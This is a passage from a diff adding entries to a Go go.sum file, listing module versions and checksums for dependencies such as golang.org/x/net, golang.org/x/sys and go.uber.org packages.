v0.22.2/go.mod h1:yxeiOL68Rb0Xd1ddK5vPZ/oVn4vY4Ynel7k9FzqtOIw= +go.opencensus.io v0.22.3/go.mod h1:yxeiOL68Rb0Xd1ddK5vPZ/oVn4vY4Ynel7k9FzqtOIw= +go.opencensus.io v0.22.4/go.mod h1:yxeiOL68Rb0Xd1ddK5vPZ/oVn4vY4Ynel7k9FzqtOIw= +go.opencensus.io v0.22.5/go.mod h1:5pWMHQbX5EPX2/62yrJeAkowc+lfs/XD7Uxpq3pI6kk= +go.opencensus.io v0.23.0/go.mod h1:XItmlyltB5F7CS4xOC1DcqMoFqwtC6OG2xF7mCv7P7E= +go.opentelemetry.io/proto/otlp v0.7.0/go.mod h1:PqfVotwruBrMGOCsRd/89rSnXhoiJIqeYNgFYFoEGnI= +go.uber.org/atomic v1.7.0/go.mod h1:fEN4uk6kAWBTFdckzkM89CLk9XfWZrxpCo0nPH17wJc= +go.uber.org/mock v0.2.0 h1:TaP3xedm7JaAgScZO7tlvlKrqT0p7I6OsdGB5YNSMDU= +go.uber.org/mock v0.2.0/go.mod h1:J0y0rp9L3xiff1+ZBfKxlC1fz2+aO16tw0tsDOixfuM= +go.uber.org/multierr v1.6.0/go.mod h1:cdWPpRnG4AhwMwsgIHip0KRBQjJy5kYEpYjJxpXp9iU= +go.uber.org/zap v1.17.0/go.mod h1:MXVU+bhUf/A7Xi2HNOnopQOrmycQ5Ih87HtOu4q5SSo= +golang.org/x/crypto v0.0.0-20180904163835-0709b304e793/go.mod h1:6SG95UA2DQfeDnfUPMdvaQW0Q7yPrPDi9nlGo2tz2b4= +golang.org/x/crypto v0.0.0-20181029021203-45a5f77698d3/go.mod h1:6SG95UA2DQfeDnfUPMdvaQW0Q7yPrPDi9nlGo2tz2b4= +golang.org/x/crypto v0.0.0-20190308221718-c2843e01d9a2/go.mod h1:djNgcEr1/C05ACkg1iLfiJU5Ep61QUkGW8qpdssI0+w= +golang.org/x/crypto v0.0.0-20190510104115-cbcb75029529/go.mod h1:yigFU9vqHzYiE8UmvKecakEJjdnWj3jj499lnFckfCI= +golang.org/x/crypto v0.0.0-20190605123033-f99c8df09eb5/go.mod h1:yigFU9vqHzYiE8UmvKecakEJjdnWj3jj499lnFckfCI= +golang.org/x/crypto v0.0.0-20190820162420-60c769a6c586/go.mod h1:yigFU9vqHzYiE8UmvKecakEJjdnWj3jj499lnFckfCI= +golang.org/x/crypto v0.0.0-20190923035154-9ee001bba392/go.mod h1:/lpIB1dKB+9EgE3H3cr1v9wB50oz8l4C4h62xy7jSTY= +golang.org/x/crypto v0.0.0-20191011191535-87dc89f01550/go.mod h1:yigFU9vqHzYiE8UmvKecakEJjdnWj3jj499lnFckfCI= +golang.org/x/crypto v0.0.0-20200302210943-78000ba7a073/go.mod h1:LzIPMQfyMNhhGPhUkYOs5KpL4U8rLKemX1yGLhDgUto= +golang.org/x/crypto v0.0.0-20200622213623-75b288015ac9/go.mod h1:LzIPMQfyMNhhGPhUkYOs5KpL4U8rLKemX1yGLhDgUto= 
+golang.org/x/crypto v0.0.0-20210817164053-32db794688a5/go.mod h1:GvvjBRRGRdwPK5ydBHafDWAxML/pGHZbMvKqRZ5+Abc= +golang.org/x/crypto v0.21.0 h1:X31++rzVUdKhX5sWmSOFZxx8UW/ldWx55cbf08iNAMA= +golang.org/x/crypto v0.21.0/go.mod h1:0BP7YvVV9gBbVKyeTG0Gyn+gZm94bibOW5BjDEYAOMs= +golang.org/x/exp v0.0.0-20190121172915-509febef88a4/go.mod h1:CJ0aWSM057203Lf6IL+f9T1iT9GByDxfZKAQTCR3kQA= +golang.org/x/exp v0.0.0-20190306152737-a1d7652674e8/go.mod h1:CJ0aWSM057203Lf6IL+f9T1iT9GByDxfZKAQTCR3kQA= +golang.org/x/exp v0.0.0-20190510132918-efd6b22b2522/go.mod h1:ZjyILWgesfNpC6sMxTJOJm9Kp84zZh5NQWvqDGG3Qr8= +golang.org/x/exp v0.0.0-20190829153037-c13cbed26979/go.mod h1:86+5VVa7VpoJ4kLfm080zCjGlMRFzhUhsZKEZO7MGek= +golang.org/x/exp v0.0.0-20191030013958-a1ab85dbe136/go.mod h1:JXzH8nQsPlswgeRAPE3MuO9GYsAcnJvJ4vnMwN/5qkY= +golang.org/x/exp v0.0.0-20191129062945-2f5052295587/go.mod h1:2RIsYlXP63K8oxa1u096TMicItID8zy7Y6sNkU49FU4= +golang.org/x/exp v0.0.0-20191227195350-da58074b4299/go.mod h1:2RIsYlXP63K8oxa1u096TMicItID8zy7Y6sNkU49FU4= +golang.org/x/exp v0.0.0-20200119233911-0405dc783f0a/go.mod h1:2RIsYlXP63K8oxa1u096TMicItID8zy7Y6sNkU49FU4= +golang.org/x/exp v0.0.0-20200207192155-f17229e696bd/go.mod h1:J/WKrq2StrnmMY6+EHIKF9dgMWnmCNThgcyBT1FY9mM= +golang.org/x/exp v0.0.0-20200224162631-6cc2880d07d6/go.mod h1:3jZMyOhIsHpP37uCMkUooju7aAi5cS1Q23tOzKc+0MU= +golang.org/x/image v0.0.0-20190227222117-0694c2d4d067/go.mod h1:kZ7UVZpmo3dzQBMxlp+ypCbDeSB+sBbTgSJuh5dn5js= +golang.org/x/image v0.0.0-20190802002840-cff245a6509b/go.mod h1:FeLwcggjj3mMvU+oOTbSwawSJRM1uh48EjtB4UJZlP0= +golang.org/x/lint v0.0.0-20181026193005-c67002cb31c3/go.mod h1:UVdnD1Gm6xHRNCYTkRU2/jEulfH38KcIWyp/GAMgvoE= +golang.org/x/lint v0.0.0-20190227174305-5b3e6a55c961/go.mod h1:wehouNa3lNwaWXcvxsM5YxQ5yQlVC4a0KAMCusXpPoU= +golang.org/x/lint v0.0.0-20190301231843-5614ed5bae6f/go.mod h1:UVdnD1Gm6xHRNCYTkRU2/jEulfH38KcIWyp/GAMgvoE= +golang.org/x/lint v0.0.0-20190313153728-d0100b6bd8b3/go.mod 
h1:6SW0HCj/g11FgYtHlgUYUwCkIfeOF89ocIRzGO/8vkc= +golang.org/x/lint v0.0.0-20190409202823-959b441ac422/go.mod h1:6SW0HCj/g11FgYtHlgUYUwCkIfeOF89ocIRzGO/8vkc= +golang.org/x/lint v0.0.0-20190909230951-414d861bb4ac/go.mod h1:6SW0HCj/g11FgYtHlgUYUwCkIfeOF89ocIRzGO/8vkc= +golang.org/x/lint v0.0.0-20190930215403-16217165b5de/go.mod h1:6SW0HCj/g11FgYtHlgUYUwCkIfeOF89ocIRzGO/8vkc= +golang.org/x/lint v0.0.0-20191125180803-fdd1cda4f05f/go.mod h1:5qLYkcX4OjUUV8bRuDixDT3tpyyb+LUpUlRWLxfhWrs= +golang.org/x/lint v0.0.0-20200130185559-910be7a94367/go.mod h1:3xt1FjdF8hUf6vQPIChWIBhFzV8gjjsPE/fR3IyQdNY= +golang.org/x/lint v0.0.0-20200302205851-738671d3881b/go.mod h1:3xt1FjdF8hUf6vQPIChWIBhFzV8gjjsPE/fR3IyQdNY= +golang.org/x/lint v0.0.0-20201208152925-83fdc39ff7b5/go.mod h1:3xt1FjdF8hUf6vQPIChWIBhFzV8gjjsPE/fR3IyQdNY= +golang.org/x/lint v0.0.0-20210508222113-6edffad5e616/go.mod h1:3xt1FjdF8hUf6vQPIChWIBhFzV8gjjsPE/fR3IyQdNY= +golang.org/x/mobile v0.0.0-20190312151609-d3739f865fa6/go.mod h1:z+o9i4GpDbdi3rU15maQ/Ox0txvL9dWGYEHz965HBQE= +golang.org/x/mobile v0.0.0-20190719004257-d2bd2a29d028/go.mod h1:E/iHnbuqvinMTCcRqshq8CkpyQDoeVncDDYHnLhea+o= +golang.org/x/mod v0.0.0-20190513183733-4bf6d317e70e/go.mod h1:mXi4GBBbnImb6dmsKGUJ2LatrhH/nqhxcFungHvyanc= +golang.org/x/mod v0.1.0/go.mod h1:0QHyrYULN0/3qlju5TqG8bIK38QM8yzMo5ekMj3DlcY= +golang.org/x/mod v0.1.1-0.20191105210325-c90efee705ee/go.mod h1:QqPTAvyqsEbceGzBzNggFXnrqF1CaUcvgkdR5Ot7KZg= +golang.org/x/mod v0.1.1-0.20191107180719-034126e5016b/go.mod h1:QqPTAvyqsEbceGzBzNggFXnrqF1CaUcvgkdR5Ot7KZg= +golang.org/x/mod v0.2.0/go.mod h1:s0Qsj1ACt9ePp/hMypM3fl4fZqREWJwdYDEqhRiZZUA= +golang.org/x/mod v0.3.0/go.mod h1:s0Qsj1ACt9ePp/hMypM3fl4fZqREWJwdYDEqhRiZZUA= +golang.org/x/mod v0.4.0/go.mod h1:s0Qsj1ACt9ePp/hMypM3fl4fZqREWJwdYDEqhRiZZUA= +golang.org/x/mod v0.4.1/go.mod h1:s0Qsj1ACt9ePp/hMypM3fl4fZqREWJwdYDEqhRiZZUA= +golang.org/x/mod v0.4.2/go.mod h1:s0Qsj1ACt9ePp/hMypM3fl4fZqREWJwdYDEqhRiZZUA= +golang.org/x/mod v0.5.0/go.mod 
h1:5OXOZSfqPIIbmVBIIKWRFfZjPR0E5r58TLhUjH0a2Ro= +golang.org/x/mod v0.8.0 h1:LUYupSeNrTNCGzR/hVBk2NHZO4hXcVaW1k4Qx7rjPx8= +golang.org/x/mod v0.8.0/go.mod h1:iBbtSCu2XBx23ZKBPSOrRkjjQPZFPuis4dIYUhu/chs= +golang.org/x/net v0.0.0-20180724234803-3673e40ba225/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4= +golang.org/x/net v0.0.0-20180826012351-8a410e7b638d/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4= +golang.org/x/net v0.0.0-20181023162649-9b4f9f5ad519/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4= +golang.org/x/net v0.0.0-20181114220301-adae6a3d119a/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4= +golang.org/x/net v0.0.0-20190108225652-1e06a53dbb7e/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4= +golang.org/x/net v0.0.0-20190213061140-3a22650c66bd/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4= +golang.org/x/net v0.0.0-20190311183353-d8887717615a/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg= +golang.org/x/net v0.0.0-20190404232315-eb5bcb51f2a3/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg= +golang.org/x/net v0.0.0-20190501004415-9ce7a6920f09/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg= +golang.org/x/net v0.0.0-20190503192946-f4e77d36d62c/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg= +golang.org/x/net v0.0.0-20190603091049-60506f45cf65/go.mod h1:HSz+uSET+XFnRR8LxR5pz3Of3rY3CfYBVs4xY44aLks= +golang.org/x/net v0.0.0-20190613194153-d28f0bde5980/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s= +golang.org/x/net v0.0.0-20190620200207-3b0461eec859/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s= +golang.org/x/net v0.0.0-20190628185345-da137c7871d7/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s= +golang.org/x/net v0.0.0-20190724013045-ca1201d0de80/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s= +golang.org/x/net v0.0.0-20190923162816-aa69164e4478/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s= +golang.org/x/net v0.0.0-20191209160850-c0dbc17a3553/go.mod 
h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s= +golang.org/x/net v0.0.0-20200114155413-6afb5195e5aa/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s= +golang.org/x/net v0.0.0-20200202094626-16171245cfb2/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s= +golang.org/x/net v0.0.0-20200222125558-5a598a2470a0/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s= +golang.org/x/net v0.0.0-20200226121028-0de0cce0169b/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s= +golang.org/x/net v0.0.0-20200301022130-244492dfa37a/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s= +golang.org/x/net v0.0.0-20200324143707-d3edc9973b7e/go.mod h1:qpuaurCH72eLCgpAm/N6yyVIVM9cpaDIP3A8BGJEC5A= +golang.org/x/net v0.0.0-20200501053045-e0ff5e5a1de5/go.mod h1:qpuaurCH72eLCgpAm/N6yyVIVM9cpaDIP3A8BGJEC5A= +golang.org/x/net v0.0.0-20200506145744-7e3656a0809f/go.mod h1:qpuaurCH72eLCgpAm/N6yyVIVM9cpaDIP3A8BGJEC5A= +golang.org/x/net v0.0.0-20200513185701-a91f0712d120/go.mod h1:qpuaurCH72eLCgpAm/N6yyVIVM9cpaDIP3A8BGJEC5A= +golang.org/x/net v0.0.0-20200520182314-0ba52f642ac2/go.mod h1:qpuaurCH72eLCgpAm/N6yyVIVM9cpaDIP3A8BGJEC5A= +golang.org/x/net v0.0.0-20200625001655-4c5254603344/go.mod h1:/O7V0waA8r7cgGh81Ro3o1hOxt32SMVPicZroKQ2sZA= +golang.org/x/net v0.0.0-20200707034311-ab3426394381/go.mod h1:/O7V0waA8r7cgGh81Ro3o1hOxt32SMVPicZroKQ2sZA= +golang.org/x/net v0.0.0-20200822124328-c89045814202/go.mod h1:/O7V0waA8r7cgGh81Ro3o1hOxt32SMVPicZroKQ2sZA= +golang.org/x/net v0.0.0-20201021035429-f5854403a974/go.mod h1:sp8m0HH+o8qH0wwXwYZr8TS3Oi6o0r6Gce1SSxlDquU= +golang.org/x/net v0.0.0-20201031054903-ff519b6c9102/go.mod h1:sp8m0HH+o8qH0wwXwYZr8TS3Oi6o0r6Gce1SSxlDquU= +golang.org/x/net v0.0.0-20201110031124-69a78807bb2b/go.mod h1:sp8m0HH+o8qH0wwXwYZr8TS3Oi6o0r6Gce1SSxlDquU= +golang.org/x/net v0.0.0-20201209123823-ac852fbbde11/go.mod h1:m0MpNAwzfU5UDzcl9v0D8zg8gWTRqZa9RBIspLL5mdg= +golang.org/x/net v0.0.0-20210119194325-5f4716e94777/go.mod h1:m0MpNAwzfU5UDzcl9v0D8zg8gWTRqZa9RBIspLL5mdg= 
+golang.org/x/net v0.0.0-20210226172049-e18ecbb05110/go.mod h1:m0MpNAwzfU5UDzcl9v0D8zg8gWTRqZa9RBIspLL5mdg= +golang.org/x/net v0.0.0-20210316092652-d523dce5a7f4/go.mod h1:RBQZq4jEuRlivfhVLdyRGr576XBO4/greRjx4P4O3yc= +golang.org/x/net v0.0.0-20210405180319-a5a99cb37ef4/go.mod h1:p54w0d4576C0XHj96bSt6lcn1PtDYWL6XObtHCRCNQM= +golang.org/x/net v0.0.0-20210410081132-afb366fc7cd1/go.mod h1:9tjilg8BloeKEkVJvy7fQ90B1CfIiPueXVOjqfkSzI8= +golang.org/x/net v0.0.0-20210503060351-7fd8e65b6420/go.mod h1:9nx3DQGgdP8bBQD5qxJ1jj9UTztislL4KSBs9R2vV5Y= +golang.org/x/net v0.0.0-20210805182204-aaa1db679c0d/go.mod h1:9nx3DQGgdP8bBQD5qxJ1jj9UTztislL4KSBs9R2vV5Y= +golang.org/x/net v0.0.0-20210813160813-60bc85c4be6d/go.mod h1:9nx3DQGgdP8bBQD5qxJ1jj9UTztislL4KSBs9R2vV5Y= +golang.org/x/net v0.23.0 h1:7EYJ93RZ9vYSZAIb2x3lnuvqO5zneoD6IvWjuhfxjTs= +golang.org/x/net v0.23.0/go.mod h1:JKghWKKOSdJwpW2GEx0Ja7fmaKnMsbu+MWVZTokSYmg= +golang.org/x/oauth2 v0.0.0-20180821212333-d2e6202438be/go.mod h1:N/0e6XlmueqKjAGxoOufVs8QHGRruUQn6yWY3a++T0U= +golang.org/x/oauth2 v0.0.0-20190226205417-e64efc72b421/go.mod h1:gOpvHmFTYa4IltrdGE7lF6nIHvwfUNPOp7c8zoXwtLw= +golang.org/x/oauth2 v0.0.0-20190604053449-0f29369cfe45/go.mod h1:gOpvHmFTYa4IltrdGE7lF6nIHvwfUNPOp7c8zoXwtLw= +golang.org/x/oauth2 v0.0.0-20191202225959-858c2ad4c8b6/go.mod h1:gOpvHmFTYa4IltrdGE7lF6nIHvwfUNPOp7c8zoXwtLw= +golang.org/x/oauth2 v0.0.0-20200107190931-bf48bf16ab8d/go.mod h1:gOpvHmFTYa4IltrdGE7lF6nIHvwfUNPOp7c8zoXwtLw= +golang.org/x/oauth2 v0.0.0-20200902213428-5d25da1a8d43/go.mod h1:KelEdhl1UZF7XfJ4dDtk6s++YSgaE7mD/BuKKDLBl4A= +golang.org/x/oauth2 v0.0.0-20201109201403-9fd604954f58/go.mod h1:KelEdhl1UZF7XfJ4dDtk6s++YSgaE7mD/BuKKDLBl4A= +golang.org/x/oauth2 v0.0.0-20201208152858-08078c50e5b5/go.mod h1:KelEdhl1UZF7XfJ4dDtk6s++YSgaE7mD/BuKKDLBl4A= +golang.org/x/oauth2 v0.0.0-20210218202405-ba52d332ba99/go.mod h1:KelEdhl1UZF7XfJ4dDtk6s++YSgaE7mD/BuKKDLBl4A= +golang.org/x/oauth2 v0.0.0-20210220000619-9bb904979d93/go.mod 
h1:KelEdhl1UZF7XfJ4dDtk6s++YSgaE7mD/BuKKDLBl4A= +golang.org/x/oauth2 v0.0.0-20210313182246-cd4f82c27b84/go.mod h1:KelEdhl1UZF7XfJ4dDtk6s++YSgaE7mD/BuKKDLBl4A= +golang.org/x/oauth2 v0.0.0-20210514164344-f6687ab2804c/go.mod h1:KelEdhl1UZF7XfJ4dDtk6s++YSgaE7mD/BuKKDLBl4A= +golang.org/x/oauth2 v0.0.0-20210628180205-a41e5a781914/go.mod h1:KelEdhl1UZF7XfJ4dDtk6s++YSgaE7mD/BuKKDLBl4A= +golang.org/x/oauth2 v0.0.0-20210805134026-6f1e6394065a/go.mod h1:KelEdhl1UZF7XfJ4dDtk6s++YSgaE7mD/BuKKDLBl4A= +golang.org/x/oauth2 v0.0.0-20210819190943-2bc19b11175f/go.mod h1:KelEdhl1UZF7XfJ4dDtk6s++YSgaE7mD/BuKKDLBl4A= +golang.org/x/oauth2 v0.0.0-20211005180243-6b3c2da341f1/go.mod h1:KelEdhl1UZF7XfJ4dDtk6s++YSgaE7mD/BuKKDLBl4A= +golang.org/x/oauth2 v0.0.0-20211104180415-d3ed0bb246c8/go.mod h1:KelEdhl1UZF7XfJ4dDtk6s++YSgaE7mD/BuKKDLBl4A= +golang.org/x/sync v0.0.0-20180314180146-1d60e4601c6f/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= +golang.org/x/sync v0.0.0-20181108010431-42b317875d0f/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= +golang.org/x/sync v0.0.0-20181221193216-37e7f081c4d4/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= +golang.org/x/sync v0.0.0-20190227155943-e225da77a7e6/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= +golang.org/x/sync v0.0.0-20190423024810-112230192c58/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= +golang.org/x/sync v0.0.0-20190911185100-cd5d95a43a6e/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= +golang.org/x/sync v0.0.0-20200317015054-43a5402ce75a/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= +golang.org/x/sync v0.0.0-20200625203802-6e8e738ad208/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= +golang.org/x/sync v0.0.0-20201020160332-67f06af15bc9/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= +golang.org/x/sync v0.0.0-20201207232520-09787c993a3a/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= +golang.org/x/sync v0.0.0-20210220032951-036812b2e83c/go.mod 
h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= +golang.org/x/sys v0.0.0-20180823144017-11551d06cbcc/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= +golang.org/x/sys v0.0.0-20180830151530-49385e6e1522/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= +golang.org/x/sys v0.0.0-20180905080454-ebe1bf3edb33/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= +golang.org/x/sys v0.0.0-20181026203630-95b1ffbd15a5/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= +golang.org/x/sys v0.0.0-20181116152217-5ac8a444bdc5/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= +golang.org/x/sys v0.0.0-20181122145206-62eef0e2fa9b/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= +golang.org/x/sys v0.0.0-20190215142949-d0b11bdaac8a/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= +golang.org/x/sys v0.0.0-20190222072716-a9d3bda3a223/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= +golang.org/x/sys v0.0.0-20190312061237-fead79001313/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20190412213103-97732733099d/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20190422165155-953cdadca894/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20190502145724-3ef323f4f1fd/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20190507160741-ecd444e8653b/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20190606165138-5da285871e9c/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20190624142023-c5567b49c5d0/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20190726091711-fc99dfbffb4e/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20190922100055-0a153f010e69/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20190924154521-2837fb4f24fe/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= 
+golang.org/x/sys v0.0.0-20191001151750-bb3f8db39f24/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20191008105621-543471e840be/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20191026070338-33540a1f6037/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20191204072324-ce4227a45e2e/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20191228213918-04cbcbbfeed8/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20200113162924-86b910548bc1/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20200116001909-b77594299b42/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20200122134326-e047566fdf82/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20200124204421-9fbb57f87de9/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20200202164722-d101bd2416d5/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20200212091648-12a6c2dcc1e4/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20200223170610-d5e6a3e2c0ae/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20200302150141-5c8b2ff67527/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20200323222414-85ca7c5b95cd/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20200331124033-c3d80250170d/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20200501052902-10377860bb8e/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20200511232937-7e40ca221e25/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20200515095857-1151b9dac4a9/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys 
v0.0.0-20200523222454-059865788121/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20200803210538-64077c9b5642/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20200905004654-be1d3432aa8f/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20200930185726-fdedc70b468f/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20201119102817-f84b799fce68/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20201201145000-ef89a241ccb3/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20210104204734-6f8348627aad/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20210119212857-b64e53b001e4/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20210124154548-22da62e12c0c/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20210220050731-9a76102bfb43/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20210303074136-134d130e1a04/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20210305230114-8fe3ee5dd75b/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20210315160823-c6e025ad8005/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20210320140829-1e4c9ba3b0c4/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20210330210617-4fbd30eecc44/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20210403161142-5e06dd20ab57/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20210423082822-04245dca01da/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20210510120138-977fb7262007/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= +golang.org/x/sys v0.0.0-20210514084401-e8d321eab015/go.mod 
